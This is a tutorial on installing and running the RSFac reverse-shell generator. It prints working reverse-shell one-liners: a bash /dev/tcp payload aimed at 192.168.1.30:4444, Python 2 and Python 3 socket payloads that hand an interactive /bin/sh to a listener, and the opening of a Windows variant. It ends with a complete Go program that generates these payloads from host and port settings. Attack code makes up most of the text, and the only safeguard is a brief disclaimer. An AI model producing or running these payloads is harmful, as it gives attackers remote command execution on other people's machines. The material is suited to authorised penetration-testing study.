Using the Reverse Shell Factory.
Date: 15/11/2021
Do not use this for malicious purposes.
RSFac (Reverse Shell Factory) is a tool written in Golang which aims to make reverse shell creation easier.
Reverse shells are very commonly used because of how easily these short snippets give control over a machine during post-exploitation.
The tool offers several options so that the reverse shell can be tailored to the pentester's scenario.
Basically speaking, a reverse shell is a piece of code that, when executed on a machine, connects back to a server the attacker already has waiting; through that connection the attacker can execute commands and receive their output from the target machine. The tool is useful when a payload has to be produced quickly for use inside the target system during post-exploitation. When one payload is blocked, reverse shells written in other programming languages have to be tried, and RSFactory automates that process by offering several options to choose from.
The RSFactory tool was initially written in Python and later ported to Golang so that it would be more portable and simpler to use on any system, since only the single binary is needed.
The tool's source code should be cloned from its GitHub repository onto the computer where it will be used.
git clone https://github.com/farinap5/rsfac.git
Now just compile the single binary and start using it.
go build rsfac.go
sudo mv rsfac /usr/bin/
rsfac -h
The tool has several usage options, but a few of them are needed in almost every case. To show the help menu use the argument:
rsfac -h
Some settings are essential for creating the payload: the IP address of the attacker's host that will wait for the reverse connection coming from the target machine, and the port that host will be listening on for the connection (over TCP in this case).
Command | Description |
---|---|
-host | Local Host |
-port | Listening Port |
Unless the chosen payload is one that will be interpreted by a web application, it must be given a host and a port; when they are omitted the tool fills in placeholder values (0.0.0.0 and 4444, as the Python outputs further down show), so always check the generated code before using it.
rsfac -host 192.168.1.30 -port 4444 -p bash
The output would be:
bash -c 'exec bash -i &>/dev/tcp/192.168.1.30/4444 <&1'
But when the payload is in a language that has more than one version, such as Python, the code can be generated for the language version that the target system supports.
Command | Description |
---|---|
-v | Payload version. |
rsfac -p py
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("0.0.0.0",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Selecting the required version:
rsfac -p py -v py3
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("0.0.0.0",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Perhaps the system under test is Windows; deviating a little from the conventional, it is also possible to generate a reverse shell for Windows.
Command | Description |
---|---|
-os | Operating system |
This option selects the operating system for which the reverse shell is generated. If the target runs a Linux kernel the option does not need to be specified, since the tool generates Linux payloads by default.
rsfac -p py -os windows
C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('0.0.0.0', 6666)),....
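To make concrete what a reverse-shell factory actually does with the -host, -port, -v and -os settings described above, here is an added example in Go. It is not code from the rsfac project: it keeps one template per payload and version, substitutes the listener host and port, and applies the same defaults the page shows (0.0.0.0 and 4444 when -host/-port are omitted, Linux when -os is omitted). The templates are the bash and Python payloads printed earlier on this page with their whitespace normalised; the Windows payload is not included because the page only shows its beginning. The Options type, the template names, and the validation rules (rejecting characters that would break out of the single-quoted shell string, out-of-range ports, and unsupported OS values) are this example's own choices.

```go
package main

import (
	"fmt"
	"net"
	"regexp"
	"strconv"
	"strings"
)

// Options mirrors the rsfac flags used on this page: -host, -port, -p, -v, -os.
// (Example type, not part of rsfac.)
type Options struct {
	Host    string // -host; empty yields the 0.0.0.0 placeholder
	Port    int    // -port; 0 yields the 4444 default
	Payload string // -p, e.g. "bash" or "py"
	Version string // -v; empty selects the payload's default interpreter
	OS      string // -os; empty means linux
}

// pyBody is shared by both Python versions: connect to the listener, dup the
// socket onto stdin/stdout/stderr, then hand those descriptors to an
// interactive /bin/sh. {{HOST}} and {{PORT}} are replaced verbatim.
const pyBody = `import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{{HOST}}",{{PORT}}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);`

// templates is keyed by payload name, then by version ("" is the default).
// Only the Linux payloads shown on this page are carried.
var templates = map[string]map[string]string{
	"bash": {
		"": `bash -c 'exec bash -i &>/dev/tcp/{{HOST}}/{{PORT}} <&1'`,
	},
	"py": {
		"":    "python -c '" + pyBody + "'",
		"py3": "python3 -c '" + pyBody + "'",
	},
}

// hostRE accepts DNS names and IP literals. Anything else (a quote, a space,
// a semicolon) would escape the single-quoted shell string the payload is
// wrapped in, so it is refused rather than rendered into a broken payload.
var hostRE = regexp.MustCompile(`^[A-Za-z0-9.:-]+$`)

// Generate renders the payload for o, applying the page's defaults and
// refusing option combinations that cannot produce a usable payload.
func Generate(o Options) (string, error) {
	host := o.Host
	if host == "" {
		host = "0.0.0.0" // same placeholder rsfac prints when -host is omitted
	}
	if net.ParseIP(host) == nil && !hostRE.MatchString(host) {
		return "", fmt.Errorf("host %q is not an IP address or hostname", o.Host)
	}
	port := o.Port
	if port == 0 {
		port = 4444 // same default rsfac prints when -port is omitted
	}
	if port < 1 || port > 65535 {
		return "", fmt.Errorf("port %d is outside 1-65535", o.Port)
	}
	if o.OS != "" && o.OS != "linux" {
		return "", fmt.Errorf("this example only carries linux templates, got os %q", o.OS)
	}
	versions, ok := templates[o.Payload]
	if !ok {
		return "", fmt.Errorf("unknown payload %q", o.Payload)
	}
	tmpl, ok := versions[o.Version]
	if !ok {
		return "", fmt.Errorf("payload %q has no version %q", o.Payload, o.Version)
	}
	r := strings.NewReplacer("{{HOST}}", host, "{{PORT}}", strconv.Itoa(port))
	return r.Replace(tmpl), nil
}

func main() {
	// Same request as "rsfac -host 192.168.1.30 -port 4444 -p bash" above.
	out, err := Generate(Options{Host: "192.168.1.30", Port: 4444, Payload: "bash"})
	if err != nil {
		fmt.Println("error:", err)
		return
	}
	fmt.Println(out)

	// A host that would break the shell quoting is refused, not rendered.
	_, err = Generate(Options{Host: "1.2.3.4'; id #", Payload: "py", Version: "py3"})
	fmt.Println("refused:", err)
}
```

The host check is the part worth keeping in mind when building or scripting around a generator like this: the value ends up inside a `'...'` string in every template, so a stray quote in the input silently produces a payload that will not run, and validating it at generation time is cheaper than discovering that on the target.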